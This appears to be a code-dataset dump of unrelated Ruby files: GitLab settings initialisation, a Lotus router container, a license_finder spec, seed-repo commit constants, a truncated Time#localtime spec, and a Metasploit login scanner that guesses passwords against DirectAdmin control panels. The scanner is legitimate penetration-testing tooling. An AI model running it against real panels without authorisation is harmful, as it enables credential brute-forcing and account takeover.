def build_gitlab_ci_url
custom_port =
if on_standard_port?(gitlab)
nil
else
":#{gitlab.port}"
end
[
gitlab.protocol,
"://",
gitlab.host,
custom_port,
gitlab.relative_url_root
].join('')
end
def build_pages_url
base_url(pages).join('')
end
def build_gitlab_shell_ssh_path_prefix
user_host = "#{gitlab_shell.ssh_user}@#{gitlab_shell.ssh_host}"
if gitlab_shell.ssh_port != 22
"ssh://#{user_host}:#{gitlab_shell.ssh_port}/"
else
if gitlab_shell.ssh_host.include? ':'
"[#{user_host}]:"
else
"#{user_host}:"
end
end
end
def build_base_gitlab_url
base_url(gitlab).join('')
end
def build_gitlab_url
(base_url(gitlab) + [gitlab.relative_url_root]).join('')
end
# check that values in `current` (string or integer) is a contant in `modul`.
def verify_constant_array(modul, current, default)
values = default || []
unless current.nil?
values = []
current.each do |constant|
values.push(verify_constant(modul, constant, nil))
end
values.delete_if { |value| value.nil? }
end
values
end
# check that `current` (string or integer) is a contant in `modul`.
def verify_constant(modul, current, default)
constant = modul.constants.find { |name| modul.const_get(name) == current }
value = constant.nil? ? default : modul.const_get(constant)
if current.is_a? String
value = modul.const_get(current.upcase) rescue default
end
value
end
def absolute(path)
File.expand_path(path, Rails.root)
end
private
def base_url(config)
custom_port = on_standard_port?(config) ? nil : ":#{config.port}"
[
config.protocol,
"://",
config.host,
custom_port
]
end
def on_standard_port?(config)
config.port.to_i == (config.https ? 443 : 80)
end
# Extract the host part of the given +url+.
def host(url)
url = url.downcase
url = "http://#{url}" unless url.start_with?('http')
# Get rid of the path so that we don't even have to encode it
url_without_path = url.sub(%r{(https?://[^\/]+)/?.*}, '\1')
URI.parse(url_without_path).host
end
# Random cron time every Sunday to load balance usage pings
def cron_random_weekly_time
hour = rand(24)
minute = rand(60)
"#{minute} #{hour} * * 0"
end
end
end
# Default settings
Settings['ldap'] ||= Settingslogic.new({})
Settings.ldap['enabled'] = false if Settings.ldap['enabled'].nil?
# backwards compatibility, we only have one host
if Settings.ldap['enabled'] || Rails.env.test?
if Settings.ldap['host'].present?
# We detected old LDAP configuration syntax. Update the config to make it
# look like it was entered with the new syntax.
server = Settings.ldap.except('sync_time')
Settings.ldap['servers'] = {
'main' => server
}
end
Settings.ldap['servers'].each do |key, server|
server = Settingslogic.new(server)
server['label'] ||= 'LDAP'
server['timeout'] ||= 10.seconds
server['block_auto_created_users'] = false if server['block_auto_created_users'].nil?
server['allow_username_or_email_login'] = false if server['allow_username_or_email_login'].nil?
server['active_directory'] = true if server['active_directory'].nil?
server['attributes'] = {} if server['attributes'].nil?
server['provider_name'] ||= "ldap#{key}".downcase
server['provider_class'] = OmniAuth::Utils.camelize(server['provider_name'])
# For backwards compatibility
server['encryption'] ||= server['method']
server['encryption'] = 'simple_tls' if server['encryption'] == 'ssl'
server['encryption'] = 'start_tls' if server['encryption'] == 'tls'
# Certificates are not verified for backwards compatibility.
# This default should be flipped to true in 9.5.
if server['verify_certificates'].nil?
server['verify_certificates'] = false
message = <<-MSG.strip_heredoc
LDAP SSL certificate verification is disabled for backwards-compatibility.
Please add the "verify_certificates" option to gitlab.yml for each LDAP
server. Certificate verification will be enabled by default in GitLab 9.5.
MSG
Rails.logger.warn(message)
end
Settings.ldap['servers'][key] = server
end
end
Settings['omniauth'] ||= Settingslogic.new({})
Settings.omniauth['enabled'] = false if Settings.omniauth['enabled'].nil?
Settings.omniauth['auto_sign_in_with_provider'] = false if Settings.omniauth['auto_sign_in_with_provider'].nil?
Settings.omniauth['allow_single_sign_on'] = false if Settings.omniauth['allow_single_sign_on'].nil?
Settings.omniauth['external_providers'] = [] if Settings.omniauth['external_providers'].nil?
Settings.omniauth['block_auto_created_users'] = true if Settings.omniauth['block_auto_created_users'].nil?
Settings.omniauth['auto_link_ldap_user'] = false if Settings.omniauth['auto_link_ldap_user'].nil?
Settings.omniauth['auto_link_saml_user'] = false if Settings.omniauth['auto_link_saml_user'].nil?
Settings.omniauth['sync_email_from_provider'] ||= nil
Settings.omniauth['providers'] ||= []
Settings.omniauth['cas3'] ||= Settingslogic.new({})
Settings.omniauth.cas3['session_duration'] ||= 8.hours
Settings.omniauth['session_tickets'] ||= Settingslogic.new({})
Settings.omniauth.session_tickets['cas3'] = 'ticket'
# Fill out omniauth-gitlab settings. It is needed for easy set up GHE or GH by just specifying url.
github_default_url = "https://github.com"
github_settings = Settings.omniauth['providers'].find { |provider| provider["name"] == "github" }
if github_settings
# For compatibility with old config files (before 7.8)
# where people dont have url in github settings
if github_settings['url'].blank?
github_settings['url'] = github_default_url
end
github_settings["args"] ||= Settingslogic.new({})
github_settings["args"]["client_options"] =
if github_settings["url"].include?(github_default_url)
OmniAuth::Strategies::GitHub.default_options[:client_options]
else
{
"site" => File.join(github_settings["url"], "api/v3"),
"authorize_url" => File.join(github_settings["url"], "login/oauth/authorize"),
"token_url" => File.join(github_settings["url"], "login/oauth/access_token")
}
end
end
Settings['shared'] ||= Settingslogic.new({})
Settings.shared['path'] = Settings.absolute(Settings.shared['path'] || "shared")
Settings['issues_tracker'] ||= {}
#
# GitLab
#
Settings['gitlab'] ||= Settingslogic.new({})
Settings.gitlab['default_projects_limit'] ||= 100000
Settings.gitlab['default_branch_protection'] ||= 2
Settings.gitlab['default_can_create_group'] = true if Settings.gitlab['default_can_create_group'].nil?
Settings.gitlab['host'] ||= ENV['GITLAB_HOST'] || 'localhost'
Settings.gitlab['ssh_host'] ||= Settings.gitlab.host
Settings.gitlab['https'] = false if Settings.gitlab['https'].nil?
Settings.gitlab['port'] ||= ENV['GITLAB_PORT'] || (Settings.gitlab.https ? 443 : 80)
Settings.gitlab['relative_url_root'] ||= ENV['RAILS_RELATIVE_URL_ROOT'] || ''
Settings.gitlab['protocol'] ||= Settings.gitlab.https ? "https" : "http"
Settings.gitlab['email_enabled'] ||= true if Settings.gitlab['email_enabled'].nil?
Settings.gitlab['email_from'] ||= ENV['GITLAB_EMAIL_FROM'] || "gitlab@#{Settings.gitlab.host}"
Settings.gitlab['email_display_name'] ||= ENV['GITLAB_EMAIL_DISPLAY_NAME'] || 'GitLab'
Settings.gitlab['email_reply_to'] ||= ENV['GITLAB_EMAIL_REPLY_TO'] || "noreply@#{Settings.gitlab.host}"
Settings.gitlab['email_subject_suffix'] ||= ENV['GITLAB_EMAIL_SUBJECT_SUFFIX'] || ""
Settings.gitlab['base_url'] ||= Settings.__send__(:build_base_gitlab_url)
Settings.gitlab['url'] ||= Settings.__send__(:build_gitlab_url)
Settings.gitlab['user'] ||= 'git'
Settings.gitlab['user_home'] ||= begin
Etc.getpwnam(Settings.gitlab['user']).dir
rescue ArgumentError # no user configured
'/home/' + Settings.gitlab['user']
end
Settings.gitlab['time_zone'] ||= nil
Settings.gitlab['signup_enabled'] ||= true if Settings.gitlab['signup_enabled'].nil?
Settings.gitlab['password_authentication_enabled'] ||= true if Settings.gitlab['password_authentication_enabled'].nil?
Settings.gitlab['restricted_visibility_levels'] = Settings.__send__(:verify_constant_array, Gitlab::VisibilityLevel, Settings.gitlab['restricted_visibility_levels'], [])
Settings.gitlab['username_changing_enabled'] = true if Settings.gitlab['username_changing_enabled'].nil?
Settings.gitlab['issue_closing_pattern'] = '((?:[Cc]los(?:e[sd]?|ing)|[Ff]ix(?:e[sd]|ing)?|[Rr]esolv(?:e[sd]?|ing))(:?) +(?:(?:issues? +)?%{issue_ref}(?:(?:, *| +and +)?)|([A-Z][A-Z0-9_]+-\d+))+)' if Settings.gitlab['issue_closing_pattern'].nil?
Settings.gitlab['default_projects_features'] ||= {}
Settings.gitlab['webhook_timeout'] ||= 10
Settings.gitlab['max_attachment_size'] ||= 10
Settings.gitlab['session_expire_delay'] ||= 10080
Settings.gitlab.default_projects_features['issues'] = true if Settings.gitlab.default_projects_features['issues'].nil?
Settings.gitlab.default_projects_features['merge_requests'] = true if Settings.gitlab.default_projects_features['merge_requests'].nil?
Settings.gitlab.default_projects_features['wiki'] = true if Settings.gitlab.default_projects_features['wiki'].nil?
Settings.gitlab.default_projects_features['snippets'] = true if Settings.gitlab.default_projects_features['snippets'].nil?
Settings.gitlab.default_projects_features['builds'] = true if Settings.gitlab.default_projects_features['builds'].nil?
Settings.gitlab.default_projects_features['container_registry'] = true if Settings.gitlab.default_projects_features['container_registry'].nil?
Settings.gitlab.default_projects_features['visibility_level'] = Settings.__send__(:verify_constant, Gitlab::VisibilityLevel, Settings.gitlab.default_projects_features['visibility_level'], Gitlab::VisibilityLevel::PRIVATE)
Settings.gitlab['domain_whitelist'] ||= []
Settings.gitlab['import_sources'] ||= %w[github bitbucket gitlab google_code fogbugz git gitlab_project gitea]
Settings.gitlab['trusted_proxies'] ||= []
Settings.gitlab['no_todos_messages'] ||= YAML.load_file(Rails.root.join('config', 'no_todos_messages.yml'))
Settings.gitlab['usage_ping_enabled'] = true if Settings.gitlab['usage_ping_enabled'].nil?
#
# CI
#
Settings['gitlab_ci'] ||= Settingslogic.new({})
Settings.gitlab_ci['shared_runners_enabled'] = true if Settings.gitlab_ci['shared_runners_enabled'].nil?
Settings.gitlab_ci['all_broken_builds'] = true if Settings.gitlab_ci['all_broken_builds'].nil?
Settings.gitlab_ci['add_pusher'] = false if Settings.gitlab_ci['add_pusher'].nil?
Settings.gitlab_ci['builds_path'] = Settings.absolute(Settings.gitlab_ci['builds_path'] || "builds/")
Settings.gitlab_ci['url'] ||= Settings.__send__(:build_gitlab_ci_url)
#
# Reply by email
#
Settings['incoming_email'] ||= Settingslogic.new({})
Settings.incoming_email['enabled'] = false if Settings.incoming_email['enabled'].nil?
#
# Build Artifacts
#
Settings['artifacts'] ||= Settingslogic.new({})
Settings.artifacts['enabled'] = true if Settings.artifacts['enabled'].nil?
Settings.artifacts['path'] = Settings.absolute(Settings.artifacts['path'] || File.join(Settings.shared['path'], "artifacts"))
Settings.artifacts['max_size'] ||= 100 # in megabytes
#
# Registry
#
Settings['registry'] ||= Settingslogic.new({})
Settings.registry['enabled'] ||= false
Settings.registry['host'] ||= "example.com"
Settings.registry['port'] ||= nil
Settings.registry['api_url'] ||= "http://localhost:5000/"
Settings.registry['key'] ||= nil
Settings.registry['issuer'] ||= nil
Settings.registry['host_port'] ||= [Settings.registry['host'], Settings.registry['port']].compact.join(':')
Settings.registry['path'] = Settings.absolute(Settings.registry['path'] || File.join(Settings.shared['path'], 'registry'))
#
# Pages
#
Settings['pages'] ||= Settingslogic.new({})
Settings.pages['enabled'] = false if Settings.pages['enabled'].nil?
Settings.pages['path'] = Settings.absolute(Settings.pages['path'] || File.join(Settings.shared['path'], "pages"))
Settings.pages['https'] = false if Settings.pages['https'].nil?
Settings.pages['host'] ||= "example.com"
Settings.pages['port'] ||= Settings.pages.https ? 443 : 80
Settings.pages['protocol'] ||= Settings.pages.https ? "https" : "http"
Settings.pages['url'] ||= Settings.__send__(:build_pages_url)
Settings.pages['external_http'] ||= false unless Settings.pages['external_http'].present?
Settings.pages['external_https'] ||= false unless Settings.pages['external_https'].present?
#
# Git LFS
#
Settings['lfs'] ||= Settingslogic.new({})
Settings.lfs['enabled'] = true if Settings.lfs['enabled'].nil?
Settings.lfs['storage_path'] = Settings.absolute(Settings.lfs['storage_path'] || File.join(Settings.shared['path'], "lfs-objects"))
#
# Mattermost
#
Settings['mattermost'] ||= Settingslogic.new({})
Settings.mattermost['enabled'] = false if Settings.mattermost['enabled'].nil?
Settings.mattermost['host'] = nil unless Settings.mattermost.enabled
#
# Gravatar
#
Settings['gravatar'] ||= Settingslogic.new({})
Settings.gravatar['enabled'] = true if Settings.gravatar['enabled'].nil?
Settings.gravatar['plain_url'] ||= 'http://www.gravatar.com/avatar/%{hash}?s=%{size}&d=identicon'
Settings.gravatar['ssl_url'] ||= 'https://secure.gravatar.com/avatar/%{hash}?s=%{size}&d=identicon'
Settings.gravatar['host'] = Settings.host_without_www(Settings.gravatar['plain_url'])
#
# Cron Jobs
#
Settings['cron_jobs'] ||= Settingslogic.new({})
Settings.cron_jobs['stuck_ci_jobs_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['stuck_ci_jobs_worker']['cron'] ||= '0 * * * *'
Settings.cron_jobs['stuck_ci_jobs_worker']['job_class'] = 'StuckCiJobsWorker'
Settings.cron_jobs['pipeline_schedule_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['pipeline_schedule_worker']['cron'] ||= '19 * * * *'
Settings.cron_jobs['pipeline_schedule_worker']['job_class'] = 'PipelineScheduleWorker'
Settings.cron_jobs['expire_build_artifacts_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['expire_build_artifacts_worker']['cron'] ||= '50 * * * *'
Settings.cron_jobs['expire_build_artifacts_worker']['job_class'] = 'ExpireBuildArtifactsWorker'
Settings.cron_jobs['repository_check_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['repository_check_worker']['cron'] ||= '20 * * * *'
Settings.cron_jobs['repository_check_worker']['job_class'] = 'RepositoryCheck::BatchWorker'
Settings.cron_jobs['admin_email_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['admin_email_worker']['cron'] ||= '0 0 * * 0'
Settings.cron_jobs['admin_email_worker']['job_class'] = 'AdminEmailWorker'
Settings.cron_jobs['repository_archive_cache_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['repository_archive_cache_worker']['cron'] ||= '0 * * * *'
Settings.cron_jobs['repository_archive_cache_worker']['job_class'] = 'RepositoryArchiveCacheWorker'
Settings.cron_jobs['import_export_project_cleanup_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['import_export_project_cleanup_worker']['cron'] ||= '0 * * * *'
Settings.cron_jobs['import_export_project_cleanup_worker']['job_class'] = 'ImportExportProjectCleanupWorker'
Settings.cron_jobs['requests_profiles_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['requests_profiles_worker']['cron'] ||= '0 0 * * *'
Settings.cron_jobs['requests_profiles_worker']['job_class'] = 'RequestsProfilesWorker'
Settings.cron_jobs['remove_expired_members_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['remove_expired_members_worker']['cron'] ||= '10 0 * * *'
Settings.cron_jobs['remove_expired_members_worker']['job_class'] = 'RemoveExpiredMembersWorker'
Settings.cron_jobs['remove_expired_group_links_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['remove_expired_group_links_worker']['cron'] ||= '10 0 * * *'
Settings.cron_jobs['remove_expired_group_links_worker']['job_class'] = 'RemoveExpiredGroupLinksWorker'
Settings.cron_jobs['prune_old_events_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['prune_old_events_worker']['cron'] ||= '0 */6 * * *'
Settings.cron_jobs['prune_old_events_worker']['job_class'] = 'PruneOldEventsWorker'
Settings.cron_jobs['trending_projects_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['trending_projects_worker']['cron'] = '0 1 * * *'
Settings.cron_jobs['trending_projects_worker']['job_class'] = 'TrendingProjectsWorker'
Settings.cron_jobs['remove_unreferenced_lfs_objects_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['remove_unreferenced_lfs_objects_worker']['cron'] ||= '20 0 * * *'
Settings.cron_jobs['remove_unreferenced_lfs_objects_worker']['job_class'] = 'RemoveUnreferencedLfsObjectsWorker'
Settings.cron_jobs['stuck_import_jobs_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['stuck_import_jobs_worker']['cron'] ||= '15 * * * *'
Settings.cron_jobs['stuck_import_jobs_worker']['job_class'] = 'StuckImportJobsWorker'
Settings.cron_jobs['gitlab_usage_ping_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['gitlab_usage_ping_worker']['cron'] ||= Settings.__send__(:cron_random_weekly_time)
Settings.cron_jobs['gitlab_usage_ping_worker']['job_class'] = 'GitlabUsagePingWorker'
Settings.cron_jobs['schedule_update_user_activity_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['schedule_update_user_activity_worker']['cron'] ||= '30 0 * * *'
Settings.cron_jobs['schedule_update_user_activity_worker']['job_class'] = 'ScheduleUpdateUserActivityWorker'
Settings.cron_jobs['remove_old_web_hook_logs_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['remove_old_web_hook_logs_worker']['cron'] ||= '40 0 * * *'
Settings.cron_jobs['remove_old_web_hook_logs_worker']['job_class'] = 'RemoveOldWebHookLogsWorker'
Settings.cron_jobs['stuck_merge_jobs_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['stuck_merge_jobs_worker']['cron'] ||= '0 */2 * * *'
Settings.cron_jobs['stuck_merge_jobs_worker']['job_class'] = 'StuckMergeJobsWorker'
#
# GitLab Shell
#
Settings['gitlab_shell'] ||= Settingslogic.new({})
Settings.gitlab_shell['path'] = Settings.absolute(Settings.gitlab_shell['path'] || Settings.gitlab['user_home'] + '/gitlab-shell/')
Settings.gitlab_shell['hooks_path'] = Settings.absolute(Settings.gitlab_shell['hooks_path'] || Settings.gitlab['user_home'] + '/gitlab-shell/hooks/')
Settings.gitlab_shell['secret_file'] ||= Rails.root.join('.gitlab_shell_secret')
Settings.gitlab_shell['receive_pack'] = true if Settings.gitlab_shell['receive_pack'].nil?
Settings.gitlab_shell['upload_pack'] = true if Settings.gitlab_shell['upload_pack'].nil?
Settings.gitlab_shell['ssh_host'] ||= Settings.gitlab.ssh_host
Settings.gitlab_shell['ssh_port'] ||= 22
Settings.gitlab_shell['ssh_user'] ||= Settings.gitlab.user
Settings.gitlab_shell['owner_group'] ||= Settings.gitlab.user
Settings.gitlab_shell['ssh_path_prefix'] ||= Settings.__send__(:build_gitlab_shell_ssh_path_prefix)
Settings.gitlab_shell['git_timeout'] ||= 800
#
# Workhorse
#
Settings['workhorse'] ||= Settingslogic.new({})
Settings.workhorse['secret_file'] ||= Rails.root.join('.gitlab_workhorse_secret')
#
# Repositories
#
Settings['repositories'] ||= Settingslogic.new({})
Settings.repositories['storages'] ||= {}
unless Settings.repositories.storages['default']
Settings.repositories.storages['default'] ||= {}
# We set the path only if the default storage doesn't exist, in case it exists
# but follows the pre-9.0 configuration structure. `6_validations.rb` initializer
# will validate all storages and throw a relevant error to the user if necessary.
Settings.repositories.storages['default']['path'] ||= Settings.gitlab['user_home'] + '/repositories/'
end
Settings.repositories.storages.each do |key, storage|
storage = Settingslogic.new(storage)
# Expand relative paths
storage['path'] = Settings.absolute(storage['path'])
# Set failure defaults
storage['failure_count_threshold'] ||= 10
storage['failure_wait_time'] ||= 30
storage['failure_reset_time'] ||= 1800
storage['storage_timeout'] ||= 5
# Set turn strings into numbers
storage['failure_count_threshold'] = storage['failure_count_threshold'].to_i
storage['failure_wait_time'] = storage['failure_wait_time'].to_i
storage['failure_reset_time'] = storage['failure_reset_time'].to_i
# We might want to have a timeout shorter than 1 second.
storage['storage_timeout'] = storage['storage_timeout'].to_f
Settings.repositories.storages[key] = storage
end
#
# The repository_downloads_path is used to remove outdated repository
# archives, if someone has it configured incorrectly, and it points
# to the path where repositories are stored this can cause some
# data-integrity issue. In this case, we sets it to the default
# repository_downloads_path value.
#
repositories_storages = Settings.repositories.storages.values
repository_downloads_path = Settings.gitlab['repository_downloads_path'].to_s.gsub(/\/$/, '')
repository_downloads_full_path = File.expand_path(repository_downloads_path, Settings.gitlab['user_home'])
if repository_downloads_path.blank? || repositories_storages.any? { |rs| [repository_downloads_path, repository_downloads_full_path].include?(rs['path'].gsub(/\/$/, '')) }
Settings.gitlab['repository_downloads_path'] = File.join(Settings.shared['path'], 'cache/archive')
end
#
# Backup
#
Settings['backup'] ||= Settingslogic.new({})
Settings.backup['keep_time'] ||= 0
Settings.backup['pg_schema'] = nil
Settings.backup['path'] = Settings.absolute(Settings.backup['path'] || "tmp/backups/")
Settings.backup['archive_permissions'] ||= 0600
Settings.backup['upload'] ||= Settingslogic.new({ 'remote_directory' => nil, 'connection' => nil })
Settings.backup['upload']['multipart_chunk_size'] ||= 104857600
Settings.backup['upload']['encryption'] ||= nil
Settings.backup['upload']['storage_class'] ||= nil
#
# Git
#
Settings['git'] ||= Settingslogic.new({})
Settings.git['max_size'] ||= 20971520 # 20.megabytes
Settings.git['bin_path'] ||= '/usr/bin/git'
Settings.git['timeout'] ||= 10
# Important: keep the satellites.path setting until GitLab 9.0 at
# least. This setting is fed to 'rm -rf' in
# db/migrate/20151023144219_remove_satellites.rb
Settings['satellites'] ||= Settingslogic.new({})
Settings.satellites['path'] = Settings.absolute(Settings.satellites['path'] || "tmp/repo_satellites/")
#
# Extra customization
#
Settings['extra'] ||= Settingslogic.new({})
#
# Rack::Attack settings
#
Settings['rack_attack'] ||= Settingslogic.new({})
Settings.rack_attack['git_basic_auth'] ||= Settingslogic.new({})
Settings.rack_attack.git_basic_auth['enabled'] = true if Settings.rack_attack.git_basic_auth['enabled'].nil?
Settings.rack_attack.git_basic_auth['ip_whitelist'] ||= %w{127.0.0.1}
Settings.rack_attack.git_basic_auth['maxretry'] ||= 10
Settings.rack_attack.git_basic_auth['findtime'] ||= 1.minute
Settings.rack_attack.git_basic_auth['bantime'] ||= 1.hour
#
# Gitaly
#
Settings['gitaly'] ||= Settingslogic.new({})
#
# Webpack settings
#
Settings['webpack'] ||= Settingslogic.new({})
Settings.webpack['dev_server'] ||= Settingslogic.new({})
Settings.webpack.dev_server['enabled'] ||= false
Settings.webpack.dev_server['host'] ||= 'localhost'
Settings.webpack.dev_server['port'] ||= 3808
#
# Monitoring settings
#
Settings['monitoring'] ||= Settingslogic.new({})
Settings.monitoring['ip_whitelist'] ||= ['127.0.0.1/8']
Settings.monitoring['unicorn_sampler_interval'] ||= 10
Settings.monitoring['sidekiq_exporter'] ||= Settingslogic.new({})
Settings.monitoring.sidekiq_exporter['enabled'] ||= false
Settings.monitoring.sidekiq_exporter['address'] ||= 'localhost'
Settings.monitoring.sidekiq_exporter['port'] ||= 3807
#
# Testing settings
#
if Rails.env.test?
Settings.gitlab['default_projects_limit'] = 42
Settings.gitlab['default_can_create_group'] = true
Settings.gitlab['default_can_create_team'] = false
end
# Force a refresh of application settings at startup
ApplicationSetting.expire
| 44.709156 | 245 | 0.717624 |
21cd752f47238cbff973489d917b450bb50bf2a2 | 1,272 | require 'thread'
require 'rack/builder'
require 'lotus/router'
module Lotus
class Container
class Router < ::Lotus::Router
def mount(app, options)
app = app.new(path_prefix: options.fetch(:at)) if lotus_app?(app)
super(app, options)
end
private
def lotus_app?(app)
app.ancestors.include? Lotus::Application
end
end
attr_reader :routes
def self.configure(options = {}, &blk)
Mutex.new.synchronize do
@@options = options
@@configuration = blk
end
end
def initialize
Mutex.new.synchronize do
assert_configuration_presence!
prepare_middleware_stack!
end
end
def call(env)
@builder.call(env)
end
private
def assert_configuration_presence!
unless self.class.class_variable_defined?(:@@configuration)
raise ArgumentError.new("#{ self.class } doesn't have any application mounted.")
end
end
def prepare_middleware_stack!
@builder = ::Rack::Builder.new
@routes = Router.new(&@@configuration)
if Lotus.environment.serve_static_assets?
require 'lotus/static'
@builder.use Lotus::Static
end
@builder.run @routes
end
end
end
| 21.2 | 88 | 0.628145 |
acdd585f80cbad25a17ad33761368b7b0ce7b9a9 | 471 | # frozen_string_literal: true
require_relative '../../support/feature_helper'
describe 'Composer Dependencies' do
let(:php_developer) { LicenseFinder::TestingDSL::User.new }
specify 'are shown in reports' do
LicenseFinder::TestingDSL::ComposerProject.create
php_developer.run_license_finder
expect(php_developer).to be_seeing_line 'vlucas/phpdotenv, v3.3.3, "New BSD"'
expect(php_developer).to be_seeing_line 'symfony/debug, v4.2.8, MIT'
end
end
| 31.4 | 81 | 0.762208 |
87d6f875135e38aabaeabf42f5780e3038296749 | 3,940 | require 'metasploit/framework/login_scanner/http'
module Metasploit
module Framework
module LoginScanner
class DirectAdmin < HTTP
DEFAULT_PORT = 443
PRIVATE_TYPES = [ :password ]
# Checks if the target is Direct Admin Web Control Panel. The login module should call this.
#
# @return [Boolean] TrueClass if target is DAWCP, otherwise FalseClass
def check_setup
login_uri = normalize_uri("#{uri}/CMD_LOGIN")
res = send_request({'uri'=> login_uri})
if res && res.body.include?('DirectAdmin Login')
return true
end
false
end
# Returns the latest sid from DirectAdmin Control Panel
#
# @return [String] The PHP Session ID for DirectAdmin Web Control login
def get_last_sid
@last_sid ||= lambda {
# We don't have a session ID. Well, let's grab one right quick from the login page.
# This should probably only happen once (initially).
login_uri = normalize_uri("#{uri}/CMD_LOGIN")
res = send_request({'uri' => login_uri})
return '' unless res
cookies = res.get_cookies
@last_sid = cookies.scan(/(session=\w+);*/).flatten[0] || ''
}.call
end
# Actually doing the login. Called by #attempt_login
#
# @param username [String] The username to try
# @param password [String] The password to try
# @return [Hash]
# * :status [Metasploit::Model::Login::Status]
# * :proof [String] the HTTP response body
def get_login_state(username, password)
# Prep the data needed for login
sid = get_last_sid
protocol = ssl ? 'https' : 'http'
peer = "#{host}:#{port}"
login_uri = normalize_uri("#{uri}/CMD_LOGIN")
res = send_request({
'uri' => login_uri,
'method' => 'POST',
'cookie' => sid,
'headers' => {
'Referer' => "#{protocol}://#{peer}/#{login_uri}"
},
'vars_post' => {
'username' => username,
'password' => password,
'referer' => '%2F'
}
})
unless res
return {:status => Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, :proof => res.to_s}
end
# After login, the application should give us a new SID
cookies = res.get_cookies
sid = cookies.scan(/(session=\w+);*/).flatten[0] || ''
@last_sid = sid # Update our SID
if res.headers['Location'].to_s.include?('/') && !sid.blank?
return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.to_s}
end
{:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.to_s}
end
# Attempts to login to DirectAdmin Web Control Panel. This is called first.
#
# @param credential [Metasploit::Framework::Credential] The credential object
# @return [Result] A Result object indicating success or failure
def attempt_login(credential)
result_opts = {
credential: credential,
status: Metasploit::Model::Login::Status::INCORRECT,
proof: nil,
host: host,
port: port,
protocol: 'tcp',
service_name: ssl ? 'https' : 'http'
}
begin
result_opts.merge!(get_login_state(credential.public, credential.private))
rescue ::Rex::ConnectionError => e
# Something went wrong during login. 'e' knows what's up.
result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e.message)
end
Result.new(result_opts)
end
end
end
end
end
| 32.833333 | 109 | 0.551269 |
21a1f28abd6e14d3e2623cc4dc161d8150fbcea1 | 1,335 | # Seed repo:
# fa1b1e6c004a68b7d8763b86455da9e6b23e36d6 Merge branch 'add-files' into 'master'
# eb49186cfa5c4338011f5f590fac11bd66c5c631 Add submodules nested deeper than the root
# 18d9c205d0d22fdf62bc2f899443b83aafbf941f Add executables and links files
# 5937ac0a7beb003549fc5fd26fc247adbce4a52e Add submodule from gitlab.com
# 570e7b2abdd848b95f2f578043fc23bd6f6fd24d Change some files
# 6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9 More submodules
# d14d6c0abdd253381df51a723d58691b2ee1ab08 Remove ds_store files
# c1acaa58bbcbc3eafe538cb8274ba387047b69f8 Ignore DS files
# ae73cb07c9eeaf35924a10f713b364d32b2dd34f Binary file added
# 874797c3a73b60d2187ed6e2fcabd289ff75171e Ruby files modified
# 2f63565e7aac07bcdadb654e253078b727143ec4 Modified image
# 33f3729a45c02fc67d00adb1b8bca394b0e761d9 Image added
# 913c66a37b4a45b9769037c55c2d238bd0942d2e Files, encoding and much more
# cfe32cf61b73a0d5e9f13e774abde7ff789b1660 Add submodule
# 6d394385cf567f80a8fd85055db1ab4c5295806f Added contributing guide
# 1a0b36b3cdad1d2ee32457c102a8c0b7056fa863 Initial commit
#
module SeedRepo
module BigCommit
ID = "913c66a37b4a45b9769037c55c2d238bd0942d2e"
PARENT_ID = "cfe32cf61b73a0d5e9f13e774abde7ff789b1660"
MESSAGE = "Files, encoding and much more"
AUTHOR_FULL_NAME = "Dmitriy Zaporozhets"
FILES_COUNT = 2
end
end
| 47.678571 | 85 | 0.865169 |
1d8f6162b84f1fb87d3327d9b7dfa9cdd3230259 | 3,630 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/methods', __FILE__)
describe "Time#localtime" do
it "converts self to local time, modifying the receiver" do
# Testing with America/Regina here because it doesn't have DST.
with_timezone("CST", -6) do
t = Time.gm(2007, 1, 9, 12, 0, 0)
t.localtime
t.should == Time.local(2007, 1, 9, 6, 0, 0)
end
end
it "returns self" do
t = Time.gm(2007, 1, 9, 12, 0, 0)
t.localtime.should equal(t)
end
ruby_version_is "1.9" do
it "converts time to the UTC offset specified as an Integer number of seconds" do
t = Time.gm(2007, 1, 9, 12, 0, 0)
t.localtime(3630)
t.should == Time.new(2007, 1, 9, 13, 0, 30, 3630)
t.utc_offset.should == 3630
end
describe "with an argument that responds to #to_int" do
it "coerces using #to_int" do
o = mock('integer')
o.should_receive(:to_int).and_return(3630)
t = Time.gm(2007, 1, 9, 12, 0, 0)
t.localtime(o)
t.should == Time.new(2007, 1, 9, 13, 0, 30, 3630)
t.utc_offset.should == 3630
end
end
it "returns a Time with a UTC offset of the specified number of Rational seconds" do
t = Time.gm(2007, 1, 9, 12, 0, 0)
t.localtime(Rational(7201, 2))
t.should == Time.new(2007, 1, 9, 13, 0, Rational(1, 2), Rational(7201, 2))
t.utc_offset.should eql(Rational(7201, 2))
end
describe "with an argument that responds to #to_r" do
it "coerces using #to_r" do
o = mock('rational')
o.should_receive(:to_r).and_return(Rational(7201, 2))
t = Time.gm(2007, 1, 9, 12, 0, 0)
t.localtime(o)
t.should == Time.new(2007, 1, 9, 13, 0, Rational(1, 2), Rational(7201, 2))
t.utc_offset.should eql(Rational(7201, 2))
end
end
it "returns a Time with a UTC offset specified as +HH:MM" do
t = Time.gm(2007, 1, 9, 12, 0, 0)
t.localtime("+01:00")
t.should == Time.new(2007, 1, 9, 13, 0, 0, 3600)
t.utc_offset.should == 3600
end
it "returns a Time with a UTC offset specified as -HH:MM" do
